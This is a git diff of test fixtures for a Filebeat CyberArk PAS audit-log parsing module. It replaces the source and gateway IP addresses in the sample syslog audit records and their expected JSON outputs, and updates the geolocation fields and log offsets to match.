+ "cyberarkpas.audit.raw": "\n\n \n yes\n Mar 11 09:38:13\n 2021-03-11T17:38:13Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 185\n Add Safe\n Info\n PSMPApp_VAGRANT\n Add Safe\n \n \n PSMRecordings\n \n 67.43.156.14\n \n \n \n \n \n Add Safe\n \n \n\n",
 "cyberarkpas.audit.rfc5424": true,
 "cyberarkpas.audit.safe": "PSMRecordings",
 "cyberarkpas.audit.severity": "Info",
- "cyberarkpas.audit.station": "81.32.170.205",
+ "cyberarkpas.audit.station": "67.43.156.14",
 "cyberarkpas.audit.timestamp": "Mar 11 09:38:13",
 "event.action": "add safe",
 "event.code": "185",
@@ -69,26 +66,23 @@
 "fileset.name": "audit",
 "host.name": "VAULT",
 "input.type": "log",
- "log.offset": 560,
+ "log.offset": 559,
 "log.syslog.priority": "5",
 "observer.hostname": "VAULT",
 "observer.product": "Vault",
 "observer.vendor": "Cyber-Ark",
 "observer.version": "11.7.0000",
 "related.ip": [
- "81.32.170.205"
+ "67.43.156.14"
 ],
 "service.type": "cyberarkpas",
- "source.address": "81.32.170.205",
- "source.geo.city_name": "Barcelona",
- "source.geo.continent_name": "Europe",
- "source.geo.country_iso_code": "ES",
- "source.geo.country_name": "Spain",
- "source.geo.location.lat": 41.3891,
- "source.geo.location.lon": 2.1611,
- "source.geo.region_iso_code": "ES-B",
- "source.geo.region_name": "Barcelona",
- "source.ip": "81.32.170.205",
+ "source.address": "67.43.156.14",
+ "source.geo.continent_name": "Asia",
+ "source.geo.country_iso_code": "BT",
+ "source.geo.country_name": "Bhutan",
+ "source.geo.location.lat": 27.5,
+ "source.geo.location.lon": 90.5,
+ "source.ip": "67.43.156.14",
 "tags": [
 "cyberarkpas.audit",
 "forwarded"
diff --git a/x-pack/filebeat/module/cyberarkpas/audit/test/187_add_folder.log b/x-pack/filebeat/module/cyberarkpas/audit/test/187_add_folder.log
index 3f7fa511cc89..8ffa672992ed 100644
--- a/x-pack/filebeat/module/cyberarkpas/audit/test/187_add_folder.log
+++ b/x-pack/filebeat/module/cyberarkpas/audit/test/187_add_folder.log
@@ -1,2 +1,2 @@
-<5>1 2021-03-10T09:11:40Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:40","IsoTimestamp":"2021-03-10T09:11:40Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"187","Desc":"Add Folder","Severity":"Info","Issuer":"Administrator","Action":"Add Folder","SourceUser":"","TargetUser":"","Safe":"PSMPADBridgeConf","File":"Root\\Scripts\\","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Folder","GatewayStation":""}}}
+<5>1 2021-03-10T09:11:40Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:40","IsoTimestamp":"2021-03-10T09:11:40Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"187","Desc":"Add Folder","Severity":"Info","Issuer":"Administrator","Action":"Add Folder","SourceUser":"","TargetUser":"","Safe":"PSMPADBridgeConf","File":"Root\\Scripts\\","Station":"67.43.156.14","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Folder","GatewayStation":""}}}
 <5>1 2021-03-11T18:01:14Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 10:01:14\n 2021-03-11T18:01:14Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 187\n Add Folder\n Info\n PVWAAppUser\n Add Folder\n \n \n PSMUnmanagedSessionAccounts\n Root\\2\\\n 10.0.1.20\n \n \n \n \n \n Add Folder\n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 10:01:14","IsoTimestamp":"2021-03-11T18:01:14Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"187","Desc":"Add Folder","Severity":"Info","Issuer":"PVWAAppUser","Action":"Add 
Folder","SourceUser":"","TargetUser":"","Safe":"PSMUnmanagedSessionAccounts","File":"Root\\2\\","Station":"10.0.1.20","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Folder","GatewayStation":""}}}
diff --git a/x-pack/filebeat/module/cyberarkpas/audit/test/187_add_folder.log-expected.json b/x-pack/filebeat/module/cyberarkpas/audit/test/187_add_folder.log-expected.json
index 35bafcb8bf3e..4322199b3565 100644
--- a/x-pack/filebeat/module/cyberarkpas/audit/test/187_add_folder.log-expected.json
+++ b/x-pack/filebeat/module/cyberarkpas/audit/test/187_add_folder.log-expected.json
@@ -10,7 +10,7 @@
 "cyberarkpas.audit.rfc5424": true,
 "cyberarkpas.audit.safe": "PSMPADBridgeConf",
 "cyberarkpas.audit.severity": "Info",
- "cyberarkpas.audit.station": "81.32.170.205",
+ "cyberarkpas.audit.station": "67.43.156.14",
 "cyberarkpas.audit.timestamp": "Mar 10 01:11:40",
 "event.action": "add folder",
 "event.code": "187",
@@ -30,19 +30,16 @@
 "observer.vendor": "Cyber-Ark",
 "observer.version": "11.7.0000",
 "related.ip": [
- "81.32.170.205"
+ "67.43.156.14"
 ],
 "service.type": "cyberarkpas",
- "source.address": "81.32.170.205",
- "source.geo.city_name": "Barcelona",
- "source.geo.continent_name": "Europe",
- "source.geo.country_iso_code": "ES",
- "source.geo.country_name": "Spain",
- "source.geo.location.lat": 41.3891,
- "source.geo.location.lon": 2.1611,
- "source.geo.region_iso_code": "ES-B",
- "source.geo.region_name": "Barcelona",
- "source.ip": "81.32.170.205",
+ "source.address": "67.43.156.14",
+ "source.geo.continent_name": "Asia",
+ "source.geo.country_iso_code": "BT",
+ "source.geo.country_name": "Bhutan",
+ "source.geo.location.lat": 27.5,
+ "source.geo.location.lon": 90.5,
+ "source.ip": "67.43.156.14",
 "tags": [
 "cyberarkpas.audit",
 "forwarded"
@@ -73,7 +70,7 @@
 "fileset.name": "audit",
 "host.name": "VAULT",
 "input.type": "log",
- "log.offset": 589,
+ "log.offset": 588,
 "log.syslog.priority": "5",
 "observer.hostname": "VAULT",
 "observer.product": "Vault",
diff --git a/x-pack/filebeat/module/cyberarkpas/audit/test/19_full_gateway_connection.log b/x-pack/filebeat/module/cyberarkpas/audit/test/19_full_gateway_connection.log
index 88926eb15710..2aa2f5923ea4 100644
--- a/x-pack/filebeat/module/cyberarkpas/audit/test/19_full_gateway_connection.log
+++ b/x-pack/filebeat/module/cyberarkpas/audit/test/19_full_gateway_connection.log
@@ -1,9 +1,9 @@ <5>1 2021-03-08T18:07:51Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 08 10:07:51","IsoTimestamp":"2021-03-08T18:07:51Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"19","Desc":"Full Gateway Connection","Severity":"Info","Issuer":"Administrator","Action":"Full Gateway Connection","SourceUser":"PVWAGWUser","TargetUser":"","Safe":"","File":"","Station":"127.0.0.1","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Full Gateway Connection","GatewayStation":"10.0.1.20"}}} -<5>1 2021-03-09T08:32:51Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 09 00:32:51","IsoTimestamp":"2021-03-09T08:32:51Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"19","Desc":"Full Gateway Connection","Severity":"Info","Issuer":"Administrator","Action":"Full Gateway Connection","SourceUser":"PVWAGWUser","TargetUser":"","Safe":"","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Full Gateway Connection","GatewayStation":"10.0.1.20"}}} -<5>1 2021-03-09T10:14:58Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 09 02:14:58","IsoTimestamp":"2021-03-09T10:14:58Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"19","Desc":"Full Gateway Connection","Severity":"Info","Issuer":"Administrator","Action":"Full Gateway Connection","SourceUser":"PVWAGWUser","TargetUser":"","Safe":"","File":"","Station":"37.223.7.45","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Full Gateway Connection","GatewayStation":"10.0.1.20"}}} +<5>1 2021-03-09T08:32:51Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 09 
00:32:51","IsoTimestamp":"2021-03-09T08:32:51Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"19","Desc":"Full Gateway Connection","Severity":"Info","Issuer":"Administrator","Action":"Full Gateway Connection","SourceUser":"PVWAGWUser","TargetUser":"","Safe":"","File":"","Station":"67.43.156.14","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Full Gateway Connection","GatewayStation":"10.0.1.20"}}} +<5>1 2021-03-09T10:14:58Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 09 02:14:58","IsoTimestamp":"2021-03-09T10:14:58Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"19","Desc":"Full Gateway Connection","Severity":"Info","Issuer":"Administrator","Action":"Full Gateway Connection","SourceUser":"PVWAGWUser","TargetUser":"","Safe":"","File":"","Station":"216.160.83.61","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Full Gateway Connection","GatewayStation":"10.0.1.20"}}} <5>1 2021-03-10T08:31:50Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 00:31:50","IsoTimestamp":"2021-03-10T08:31:50Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"19","Desc":"Full Gateway Connection","Severity":"Info","Issuer":"PasswordManager","Action":"Full Gateway Connection","SourceUser":"PVWAGWUser","TargetUser":"","Safe":"","File":"","Station":"10.0.1.20","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Full Gateway Connection","GatewayStation":"10.0.1.20"}}} <5>1 2021-03-10T22:37:00Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 
14:37:00","IsoTimestamp":"2021-03-10T22:37:00Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"19","Desc":"Full Gateway Connection","Severity":"Info","Issuer":"Administrator","Action":"Full Gateway Connection","SourceUser":"PVWAGWUser","TargetUser":"","Safe":"","File":"","Station":"10.0.1.10","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Full Gateway Connection","GatewayStation":"10.0.1.20"}}} -<5>1 2021-03-11T17:38:05Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 09:38:05\n 2021-03-11T17:38:05Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 19\n Full Gateway Connection\n Info\n Administrator\n Full Gateway Connection\n PSMPGW_VAGRANT\n \n \n \n 127.0.0.1\n \n \n \n \n \n Full Gateway Connection\n 81.32.170.205\n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 09:38:05","IsoTimestamp":"2021-03-11T17:38:05Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"19","Desc":"Full Gateway Connection","Severity":"Info","Issuer":"Administrator","Action":"Full Gateway Connection","SourceUser":"PSMPGW_VAGRANT","TargetUser":"","Safe":"","File":"","Station":"127.0.0.1","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Full Gateway Connection","GatewayStation":"81.32.170.205"}}} -<5>1 2021-03-11T17:48:22Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 09:48:22\n 2021-03-11T17:48:22Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 19\n Full Gateway Connection\n Info\n Administrator\n Full Gateway Connection\n PSMPGW_VAGRANT\n \n \n \n 10.0.2.2\n \n \n \n \n \n Full Gateway Connection\n 81.32.170.205\n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 09:48:22","IsoTimestamp":"2021-03-11T17:48:22Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"19","Desc":"Full Gateway 
Connection","Severity":"Info","Issuer":"Administrator","Action":"Full Gateway Connection","SourceUser":"PSMPGW_VAGRANT","TargetUser":"","Safe":"","File":"","Station":"10.0.2.2","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Full Gateway Connection","GatewayStation":"81.32.170.205"}}} -<5>1 2021-03-11T18:02:57Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 10:02:57\n 2021-03-11T18:02:57Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 19\n Full Gateway Connection\n Info\n Administrator\n Full Gateway Connection\n PVWAGWUser\n \n \n \n 35.192.121.42\n \n \n \n \n \n Full Gateway Connection\n 10.0.1.20\n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 10:02:57","IsoTimestamp":"2021-03-11T18:02:57Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"19","Desc":"Full Gateway Connection","Severity":"Info","Issuer":"Administrator","Action":"Full Gateway Connection","SourceUser":"PVWAGWUser","TargetUser":"","Safe":"","File":"","Station":"35.192.121.42","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Full Gateway Connection","GatewayStation":"10.0.1.20"}}} -<5>1 2021-03-14T13:49:35Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 14 06:49:35\n 2021-03-14T13:49:35Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 19\n Full Gateway Connection\n Info\n Administrator\n Full Gateway Connection\n PSMPGW_SSH\n \n \n \n 81.32.170.205\n \n \n \n \n \n Full Gateway Connection\n 34.71.250.247\n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 14 06:49:35","IsoTimestamp":"2021-03-14T13:49:35Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"19","Desc":"Full Gateway Connection","Severity":"Info","Issuer":"Administrator","Action":"Full Gateway 
Connection","SourceUser":"PSMPGW_SSH","TargetUser":"","Safe":"","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Full Gateway Connection","GatewayStation":"34.71.250.247"}}} +<5>1 2021-03-11T17:38:05Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 09:38:05\n 2021-03-11T17:38:05Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 19\n Full Gateway Connection\n Info\n Administrator\n Full Gateway Connection\n PSMPGW_VAGRANT\n \n \n \n 127.0.0.1\n \n \n \n \n \n Full Gateway Connection\n 67.43.156.14\n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 09:38:05","IsoTimestamp":"2021-03-11T17:38:05Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"19","Desc":"Full Gateway Connection","Severity":"Info","Issuer":"Administrator","Action":"Full Gateway Connection","SourceUser":"PSMPGW_VAGRANT","TargetUser":"","Safe":"","File":"","Station":"127.0.0.1","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Full Gateway Connection","GatewayStation":"67.43.156.14"}}} +<5>1 2021-03-11T17:48:22Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 09:48:22\n 2021-03-11T17:48:22Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 19\n Full Gateway Connection\n Info\n Administrator\n Full Gateway Connection\n PSMPGW_VAGRANT\n \n \n \n 10.0.2.2\n \n \n \n \n \n Full Gateway Connection\n 67.43.156.14\n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 09:48:22","IsoTimestamp":"2021-03-11T17:48:22Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"19","Desc":"Full Gateway Connection","Severity":"Info","Issuer":"Administrator","Action":"Full Gateway Connection","SourceUser":"PSMPGW_VAGRANT","TargetUser":"","Safe":"","File":"","Station":"10.0.2.2","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Full Gateway 
Connection","GatewayStation":"67.43.156.14"}}} +<5>1 2021-03-11T18:02:57Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 10:02:57\n 2021-03-11T18:02:57Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 19\n Full Gateway Connection\n Info\n Administrator\n Full Gateway Connection\n PVWAGWUser\n \n \n \n 67.43.156.12\n \n \n \n \n \n Full Gateway Connection\n 10.0.1.20\n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 10:02:57","IsoTimestamp":"2021-03-11T18:02:57Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"19","Desc":"Full Gateway Connection","Severity":"Info","Issuer":"Administrator","Action":"Full Gateway Connection","SourceUser":"PVWAGWUser","TargetUser":"","Safe":"","File":"","Station":"67.43.156.12","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Full Gateway Connection","GatewayStation":"10.0.1.20"}}} +<5>1 2021-03-14T13:49:35Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 14 06:49:35\n 2021-03-14T13:49:35Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 19\n Full Gateway Connection\n Info\n Administrator\n Full Gateway Connection\n PSMPGW_SSH\n \n \n \n 67.43.156.14\n \n \n \n \n \n Full Gateway Connection\n 81.2.69.143\n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 14 06:49:35","IsoTimestamp":"2021-03-14T13:49:35Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"19","Desc":"Full Gateway Connection","Severity":"Info","Issuer":"Administrator","Action":"Full Gateway Connection","SourceUser":"PSMPGW_SSH","TargetUser":"","Safe":"","File":"","Station":"67.43.156.14","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Full Gateway Connection","GatewayStation":"81.2.69.143"}}} 
diff --git a/x-pack/filebeat/module/cyberarkpas/audit/test/19_full_gateway_connection.log-expected.json b/x-pack/filebeat/module/cyberarkpas/audit/test/19_full_gateway_connection.log-expected.json
index ceda7e9f02bf..34016e02435d 100644
--- a/x-pack/filebeat/module/cyberarkpas/audit/test/19_full_gateway_connection.log-expected.json
+++ b/x-pack/filebeat/module/cyberarkpas/audit/test/19_full_gateway_connection.log-expected.json
@@ -68,7 +68,7 @@
 "cyberarkpas.audit.rfc5424": true,
 "cyberarkpas.audit.severity": "Info",
 "cyberarkpas.audit.source_user": "PVWAGWUser",
- "cyberarkpas.audit.station": "81.32.170.205",
+ "cyberarkpas.audit.station": "67.43.156.14",
 "cyberarkpas.audit.timestamp": "Mar 09 00:32:51",
 "destination.address": "10.0.1.20",
 "destination.ip": "10.0.1.20",
@@ -99,23 +99,20 @@
 "observer.version": "11.7.0000",
 "related.ip": [
 "10.0.1.20",
- "81.32.170.205"
+ "67.43.156.14"
 ],
 "related.user": [
 "Administrator",
 "PVWAGWUser"
 ],
 "service.type": "cyberarkpas",
- "source.address": "81.32.170.205",
- "source.geo.city_name": "Barcelona",
- "source.geo.continent_name": "Europe",
- "source.geo.country_iso_code": "ES",
- "source.geo.country_name": "Spain",
- "source.geo.location.lat": 41.3891,
- "source.geo.location.lon": 2.1611,
- "source.geo.region_iso_code": "ES-B",
- "source.geo.region_name": "Barcelona",
- "source.ip": "81.32.170.205",
+ "source.address": "67.43.156.14",
+ "source.geo.continent_name": "Asia",
+ "source.geo.country_iso_code": "BT",
+ "source.geo.country_name": "Bhutan",
+ "source.geo.location.lat": 27.5,
+ "source.geo.location.lon": 90.5,
+ "source.ip": "67.43.156.14",
 "source.user.name": "PVWAGWUser",
 "tags": [
 "cyberarkpas.audit",
@@ -134,7 +131,7 @@
 "cyberarkpas.audit.rfc5424": true,
 "cyberarkpas.audit.severity": "Info",
 "cyberarkpas.audit.source_user": "PVWAGWUser",
- "cyberarkpas.audit.station": "37.223.7.45",
+ "cyberarkpas.audit.station": "216.160.83.61",
 "cyberarkpas.audit.timestamp": "Mar 09 02:14:58",
 "destination.address": "10.0.1.20",
 "destination.ip": "10.0.1.20",
@@ -156,7 +153,7 @@
 "fileset.name": "audit",
 "host.name": "VAULT",
 "input.type": "log",
- "log.offset": 1226,
+ "log.offset": 1225,
 "log.syslog.priority": "5",
 "network.direction": "inbound",
 "observer.hostname": "VAULT",
@@ -165,23 +162,23 @@
 "observer.version": "11.7.0000",
 "related.ip": [
 "10.0.1.20",
- "37.223.7.45"
+ "216.160.83.61"
 ],
 "related.user": [
 "Administrator",
 "PVWAGWUser"
 ],
 "service.type": "cyberarkpas",
- "source.address": "37.223.7.45",
- "source.geo.city_name": "Barcelona",
- "source.geo.continent_name": "Europe",
- "source.geo.country_iso_code": "ES",
- "source.geo.country_name": "Spain",
- "source.geo.location.lat": 41.3891,
- "source.geo.location.lon": 2.1611,
- "source.geo.region_iso_code": "ES-B",
- "source.geo.region_name": "Barcelona",
- "source.ip": "37.223.7.45",
+ "source.address": "216.160.83.61",
+ "source.geo.city_name": "Milton",
+ "source.geo.continent_name": "North America",
+ "source.geo.country_iso_code": "US",
+ "source.geo.country_name": "United States",
+ "source.geo.location.lat": 47.2513,
+ "source.geo.location.lon": -122.3149,
+ "source.geo.region_iso_code": "US-WA",
+ "source.geo.region_name": "Washington",
+ "source.ip": "216.160.83.61",
 "source.user.name": "PVWAGWUser",
 "tags": [
 "cyberarkpas.audit",
@@ -222,7 +219,7 @@
 "fileset.name": "audit",
 "host.name": "VAULT",
 "input.type": "log",
- "log.offset": 1839,
+ "log.offset": 1840,
 "log.syslog.priority": "5",
 "network.direction": "internal",
 "observer.hostname": "VAULT",
@@ -279,7 +276,7 @@
 "fileset.name": "audit",
 "host.name": "VAULT",
 "input.type": "log",
- "log.offset": 2452,
+ "log.offset": 2453,
 "log.syslog.priority": "5",
 "network.direction": "internal",
 "observer.hostname": "VAULT",
@@ -308,26 +305,23 @@
 "@timestamp": "2021-03-11T17:38:05.000Z",
 "cyberarkpas.audit.action": "Full Gateway Connection",
 "cyberarkpas.audit.desc": "Full Gateway Connection",
- "cyberarkpas.audit.gateway_station": "81.32.170.205",
+ "cyberarkpas.audit.gateway_station": "67.43.156.14",
 "cyberarkpas.audit.iso_timestamp": "2021-03-11T17:38:05Z",
 "cyberarkpas.audit.issuer": "Administrator",
 "cyberarkpas.audit.message": "Full Gateway Connection",
- "cyberarkpas.audit.raw": "\n\n \n yes\n Mar 11 09:38:05\n 2021-03-11T17:38:05Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 19\n Full Gateway Connection\n Info\n Administrator\n Full Gateway Connection\n PSMPGW_VAGRANT\n \n \n \n 127.0.0.1\n \n \n \n \n \n Full Gateway Connection\n 81.32.170.205\n \n\n",
+ "cyberarkpas.audit.raw": "\n\n \n yes\n Mar 11 09:38:05\n 2021-03-11T17:38:05Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 19\n Full Gateway Connection\n Info\n Administrator\n Full Gateway Connection\n PSMPGW_VAGRANT\n \n \n \n 127.0.0.1\n \n \n \n \n \n Full Gateway Connection\n 67.43.156.14\n \n\n",
 "cyberarkpas.audit.rfc5424": true,
 "cyberarkpas.audit.severity": "Info",
 "cyberarkpas.audit.source_user": "PSMPGW_VAGRANT",
 "cyberarkpas.audit.station": "127.0.0.1",
 "cyberarkpas.audit.timestamp": "Mar 11 09:38:05",
- "destination.address": "81.32.170.205",
- "destination.geo.city_name": "Barcelona",
- "destination.geo.continent_name": "Europe",
- "destination.geo.country_iso_code": "ES",
- "destination.geo.country_name": "Spain",
- "destination.geo.location.lat": 41.3891,
- "destination.geo.location.lon": 2.1611,
- "destination.geo.region_iso_code": "ES-B",
- "destination.geo.region_name": "Barcelona",
- "destination.ip": "81.32.170.205",
+ "destination.address": "67.43.156.14",
+ "destination.geo.continent_name": "Asia",
+ "destination.geo.country_iso_code": "BT",
+ "destination.geo.country_name": "Bhutan",
+ "destination.geo.location.lat": 27.5,
+ "destination.geo.location.lon": 90.5,
+ "destination.ip": "67.43.156.14",
 "destination.user.name": "Administrator",
 "event.action": "full gateway connection",
 "event.category": [
@@ -346,7 +340,7 @@
 "fileset.name": "audit",
 "host.name": "VAULT",
 "input.type": "log",
- "log.offset": 3063,
+ "log.offset": 3064,
 "log.syslog.priority": "5",
 "network.direction": "outbound",
 "observer.hostname": "VAULT",
@@ -355,7 +349,7 @@
 "observer.version": "11.7.0000",
 "related.ip": [
 "127.0.0.1",
- "81.32.170.205"
+ "67.43.156.14"
 ],
 "related.user": [
 "Administrator",
@@ -375,26 +369,23 @@
 "@timestamp": "2021-03-11T17:48:22.000Z",
 "cyberarkpas.audit.action": "Full Gateway Connection",
 "cyberarkpas.audit.desc": "Full Gateway Connection",
- "cyberarkpas.audit.gateway_station": "81.32.170.205",
+ "cyberarkpas.audit.gateway_station": "67.43.156.14",
 "cyberarkpas.audit.iso_timestamp": "2021-03-11T17:48:22Z",
 "cyberarkpas.audit.issuer": "Administrator",
 "cyberarkpas.audit.message": "Full Gateway Connection",
- "cyberarkpas.audit.raw": "\n\n \n yes\n Mar 11 09:48:22\n 2021-03-11T17:48:22Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 19\n Full Gateway Connection\n Info\n Administrator\n Full Gateway Connection\n PSMPGW_VAGRANT\n \n \n \n 10.0.2.2\n \n \n \n \n \n Full Gateway Connection\n 81.32.170.205\n \n\n",
+ "cyberarkpas.audit.raw": "\n\n \n yes\n Mar 11 09:48:22\n 2021-03-11T17:48:22Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 19\n Full Gateway Connection\n Info\n Administrator\n Full Gateway Connection\n PSMPGW_VAGRANT\n \n \n \n 10.0.2.2\n \n \n \n \n \n Full Gateway Connection\n 67.43.156.14\n \n\n",
 "cyberarkpas.audit.rfc5424": true,
 "cyberarkpas.audit.severity": "Info",
 "cyberarkpas.audit.source_user": "PSMPGW_VAGRANT",
 "cyberarkpas.audit.station": "10.0.2.2",
 "cyberarkpas.audit.timestamp": "Mar 11 09:48:22",
- "destination.address": "81.32.170.205",
- "destination.geo.city_name": "Barcelona",
- "destination.geo.continent_name": "Europe",
- "destination.geo.country_iso_code": "ES",
- "destination.geo.country_name": "Spain",
- "destination.geo.location.lat": 41.3891,
- "destination.geo.location.lon": 2.1611,
- "destination.geo.region_iso_code": "ES-B",
- "destination.geo.region_name": "Barcelona",
- "destination.ip": "81.32.170.205",
+ "destination.address": "67.43.156.14",
+ "destination.geo.continent_name": "Asia",
+ "destination.geo.country_iso_code": "BT",
+ "destination.geo.country_name": "Bhutan",
+ "destination.geo.location.lat": 27.5,
+ "destination.geo.location.lon": 90.5,
+ "destination.ip": "67.43.156.14",
 "destination.user.name": "Administrator",
 "event.action": "full gateway connection",
 "event.category": [
@@ -413,7 +404,7 @@
 "fileset.name": "audit",
 "host.name": "VAULT",
 "input.type": "log",
- "log.offset": 4581,
+ "log.offset": 4580,
 "log.syslog.priority": "5",
 "network.direction": "outbound",
 "observer.hostname": "VAULT",
@@ -422,7 +413,7 @@
 "observer.version": "11.7.0000",
 "related.ip": [
 "10.0.2.2",
- "81.32.170.205"
+ "67.43.156.14"
 ],
 "related.user": [
 "Administrator",
@@ -446,11 +437,11 @@
 "cyberarkpas.audit.iso_timestamp": "2021-03-11T18:02:57Z",
 "cyberarkpas.audit.issuer": "Administrator",
 "cyberarkpas.audit.message": "Full Gateway Connection",
- "cyberarkpas.audit.raw": "\n\n \n yes\n Mar 11 10:02:57\n 2021-03-11T18:02:57Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 19\n Full Gateway Connection\n Info\n Administrator\n Full Gateway Connection\n PVWAGWUser\n \n \n \n 35.192.121.42\n \n \n \n \n \n Full Gateway Connection\n 10.0.1.20\n \n\n",
+ "cyberarkpas.audit.raw": "\n\n \n yes\n Mar 11 10:02:57\n 2021-03-11T18:02:57Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 19\n Full Gateway Connection\n Info\n Administrator\n Full Gateway Connection\n PVWAGWUser\n \n \n \n 67.43.156.12\n \n \n \n \n \n Full Gateway Connection\n 10.0.1.20\n \n\n",
 "cyberarkpas.audit.rfc5424": true,
 "cyberarkpas.audit.severity": "Info",
 "cyberarkpas.audit.source_user": "PVWAGWUser",
- "cyberarkpas.audit.station": "35.192.121.42",
+ "cyberarkpas.audit.station": "67.43.156.12",
 "cyberarkpas.audit.timestamp": "Mar 11 10:02:57",
 "destination.address": "10.0.1.20",
 "destination.ip": "10.0.1.20",
